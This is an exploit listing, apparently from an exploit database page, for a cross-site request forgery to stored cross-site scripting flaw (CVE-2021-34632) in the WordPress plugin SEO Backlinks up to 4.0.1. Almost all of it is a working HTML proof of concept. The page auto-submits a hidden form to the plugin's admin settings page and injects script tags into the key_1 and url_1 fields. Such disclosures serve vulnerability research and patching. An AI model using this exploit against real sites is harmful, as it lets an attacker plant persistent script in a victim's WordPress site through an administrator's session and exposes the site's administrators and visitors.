Exploit for SEO Backlinks <= 4.0.1 - CSRF to Stored XSS CVE-2021-34632

Name: Exploit for SEO Backlinks <= 4.0.1 - CSRF to Stored XSS CVE-2021-34632
Rating: 5 (115 reviews)

2021-07-28 | CVSS 6.8

## https://sploitus.com/exploit?id=WPEX-ID:7CFEFCC9-ADBF-4AFC-B25F-92F417650359
<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title>CSRF PoC</title>
</head>

<body onload="csrfSubmit();">
<form target="dummyfrm" name="evilform" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=loc_menu" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="loc_sensitive" value="No" />
<input type="hidden" name="loc_target_blank" value="No" />
<input type="hidden" name="loc_back" value="Yes" />
<input type="hidden" name="key_1" value=""><script>alert(1)</script>" />
<input type="hidden" name="url_1" value=""><script>alert(1)</script>" />
<input type="hidden" name="key_2" value="" />
<input type="hidden" name="url_2" value="" />
<input type="hidden" name="submitted" value="" />
</form>
<iframe src="x" width="1" height="1" name="dummyfrm" style="visibility:hidden"></iframe>
<script>
function csrfSubmit(){
    let submit = HTMLFormElement.prototype["submit"].bind(document.evilform);
    submit();
}
</script>

<p>CSRF PoC</p>
</html>